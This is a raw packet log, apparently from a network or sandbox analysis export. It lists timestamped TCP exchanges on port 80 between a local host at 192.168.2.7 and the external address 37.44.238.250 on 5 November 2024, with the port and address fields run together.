                                        Nov 5, 2024 08:12:40.912292957 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:40.912358046 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.912460089 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:40.917459011 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.271466970 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.276340961 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.732081890 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.786782026 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.812880039 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.864902973 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.939951897 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.940392971 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945493937 CET804989437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.945569992 CET4989480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945745945 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:41.945822001 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.945900917 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:41.950989008 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.302489996 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.307518959 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.627599001 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.627995968 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633090019 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.633161068 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633456945 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.633676052 CET804990037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.633728981 CET4990080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.638983965 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.975450039 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.980346918 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.980416059 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.980545044 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.985826969 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.990045071 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:42.994877100 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:42.994929075 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.333689928 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.338736057 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.447751045 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.489929914 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.524463892 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.568078995 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.791974068 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.833667040 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.873958111 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.927378893 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.985428095 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.985444069 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.986010075 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.990861893 CET804991337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.990926027 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.991014004 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.991816044 CET804990637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.991873980 CET4990680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.992010117 CET804990737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:43.992069960 CET4990780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:43.996300936 CET804991337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:44.349417925 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:44.354397058 CET804991337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:44.804050922 CET804991337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:44.849267960 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:44.881386042 CET804991337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:44.927519083 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.007678032 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.012638092 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:45.012753963 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.012877941 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.017983913 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:45.368901968 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.374057055 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:45.824322939 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:45.864881039 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:45.895646095 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:45.943011045 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.038300037 CET4991380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.040576935 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.041394949 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.045758963 CET804991937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:46.045845985 CET4991980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.046323061 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:46.046403885 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.046489954 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.051471949 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:46.396395922 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:46.661217928 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:46.857409000 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:46.911930084 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.001858950 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.052397013 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.128240108 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.128921032 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.133696079 CET804992737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.133779049 CET4992780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.133816004 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.133887053 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.134038925 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.139916897 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.490169048 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:47.495390892 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.945344925 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:47.989886045 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.018330097 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.068018913 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.143887997 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.144589901 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.149367094 CET804993337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.149444103 CET4993380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.149452925 CET804993937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.149525881 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.149640083 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.154525042 CET804993937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.505789042 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.510881901 CET804993937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.537830114 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.538204908 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.543009996 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.543081999 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.543176889 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.548043013 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.582875967 CET804993937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.660944939 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.666034937 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.666129112 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.666261911 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.671382904 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.741110086 CET804993937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.741163015 CET4993980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.896238089 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:48.901326895 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:48.901338100 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.021331072 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.026315928 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.357350111 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.411853075 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.434143066 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.476536989 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.489891052 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.521203041 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.559555054 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.599387884 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.673683882 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.673708916 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.675173044 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.678724051 CET804994137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.678782940 CET4994180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.679186106 CET804994237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.679230928 CET4994280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.680011034 CET804994837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:49.680073977 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.680170059 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:49.685497999 CET804994837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:50.038290024 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.043227911 CET804994837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:50.482801914 CET804994837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:50.536761045 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.556415081 CET804994837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:50.599241018 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.674293041 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.679717064 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:50.682827950 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.682934999 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:50.688007116 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.037007093 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.041933060 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.505243063 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.552341938 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.586843967 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.630466938 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.704248905 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.704853058 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.709548950 CET804995737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.709602118 CET4995780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.709606886 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:51.709667921 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.709793091 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:51.714550972 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.068077087 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.073071003 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.531138897 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.583628893 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.612224102 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.661755085 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.943732977 CET4994880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.944760084 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.946042061 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.951126099 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.951204062 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.951339960 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.952085972 CET804996437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:52.952150106 CET4996480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:52.957298994 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.302524090 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.307348967 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.767466068 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.817977905 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.839678049 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.880459070 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.955584049 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.956068993 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.961430073 CET804997037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.961487055 CET4997080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.961693048 CET804997637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:53.961762905 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.961875916 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:53.967947006 CET804997637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.318248987 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.323276043 CET804997637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.443969011 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.444556952 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.449385881 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.449476004 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.449596882 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.455094099 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.494947910 CET804997637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.539768934 CET804997637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.539982080 CET4997680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.566713095 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.571660042 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.571754932 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.571856976 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.577071905 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.802529097 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.807545900 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.807802916 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:54.927478075 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:54.932360888 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.271466017 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.318136930 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.351783991 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.391133070 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.396091938 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.443075895 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.468451023 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.521090031 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.766150951 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.766170025 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.767096043 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.771550894 CET804998137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.771565914 CET804998237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.771609068 CET4998180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.771668911 CET4998280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.772061110 CET804998837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:55.772138119 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.772269964 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:55.777075052 CET804998837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:56.130708933 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.135663033 CET804998837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:56.582828999 CET804998837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:56.630646944 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.670603037 CET804998837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:56.724261999 CET4998880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.785012960 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.789926052 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:56.789999962 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.790093899 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:56.794893026 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.146174908 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.162961006 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.603951931 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.646078110 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.679702044 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.724200964 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.823992968 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.825187922 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.830807924 CET804999537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.830862999 CET4999580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.831609964 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:57.831672907 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.831782103 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:57.838105917 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.180268049 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.187338114 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.642144918 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.692951918 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.733824968 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.786732912 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.863945007 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.864753962 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.869168997 CET805000337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.869225979 CET5000380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.869582891 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:58.869668007 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.869741917 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:58.874857903 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.224294901 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.233719110 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.693938017 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.739815950 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.765176058 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.817939997 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.894906044 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.895656109 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.900697947 CET805001037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.900747061 CET5001080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.900804043 CET805001537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:59.900866032 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.900954008 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:59.905930042 CET805001537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.255709887 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.260685921 CET805001537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.381298065 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.381762028 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.386684895 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.386776924 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.386843920 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.391691923 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.430856943 CET805001537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.484695911 CET805001537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.484771967 CET5001580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.506242037 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.512435913 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.512521982 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.512626886 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.519433022 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.741700888 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.746541977 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.746721983 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:00.865135908 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:00.871103048 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.197571039 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.242625952 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.280098915 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.325997114 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.333553076 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.380482912 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.401242018 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.442944050 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.516829967 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.516833067 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.517649889 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.522912979 CET805001837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.522973061 CET5001880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.522974968 CET805001737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.522985935 CET805002137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.523036957 CET5001780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.523068905 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.523168087 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.528271914 CET805002137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:01.880660057 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:01.885740995 CET805002137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:02.342749119 CET805002137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:02.396060944 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:02.418144941 CET805002137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:02.474199057 CET5002180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:02.533818007 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:02.538800001 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:02.538885117 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:02.538974047 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:02.543850899 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:02.896171093 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:03.130461931 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:03.176727057 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:03.177385092 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:03.359819889 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:03.411787033 CET5002280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:03.478959084 CET805002237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:03.521219969 CET5002280192.168.2.737.44.238.250
